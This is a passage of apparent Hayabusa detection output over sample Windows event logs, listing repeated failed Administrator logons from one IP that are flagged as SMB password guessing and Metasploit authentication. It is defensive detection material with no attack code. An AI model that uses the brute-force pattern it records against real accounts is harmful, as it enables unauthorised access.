Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 